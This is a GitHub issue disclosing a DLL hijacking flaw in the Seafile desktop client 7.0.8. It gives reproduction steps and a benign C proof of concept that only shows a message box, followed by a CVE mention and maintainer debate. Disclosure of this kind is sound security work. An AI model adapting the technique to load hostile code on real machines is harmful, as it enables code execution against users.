search

haiwen / seafile-client

Seafile desktop client.
http://seafile.com
Apache License 2.0
469 stars 281 forks source link

DLL Hijacking "exchndl.dll" #1309

Open b1nary0x1 opened 4 years ago

b1nary0x1 commented 4 years ago

DLL: exchndl.dll Affected Process: seaf-daemon.exe Tested on: Windows 10 Pro x64 Version 10.0.19041

Description: Seafile Client ver 7.0.8 is vulnerable to DLL hijacking because it loads “exchndl.dll” from the current working directory.

Steps to reproduce:

  1. Compile the following code and name the output dll file as “exchndl.dll”.
  2. Execute Seafile from where the “exchndl.dll” exists.
  3. The “exchndl.dll” file will be executed.

PoC Code:

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_mll();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

int dll_mll()
{
    MessageBox(0, "Seafile DLL Hijacked!", "DLL Message", MB_OK);
}

Screenshots: new

b1nary0x1 commented 3 years ago

Please note that CVE-2020-16143 was assigned.

killing commented 3 years ago

Sorry but I don't understand why this is a security issue. Users install Seafile client in system directories. The attacker has to first have the permission to write to the system directories. And it's usual for applications to load dlls. There are a lot of dll files in Seafile, why only is this one dangerous?

kateyy commented 3 years ago

@killing is it intentional to load this library at all still? Because it was dropped from release packages some time ago. See here: https://github.com/haiwen/seafile/blob/f0097a706b007d5e6b1aff7af2c536124199840d/daemon/seaf-daemon.c#L398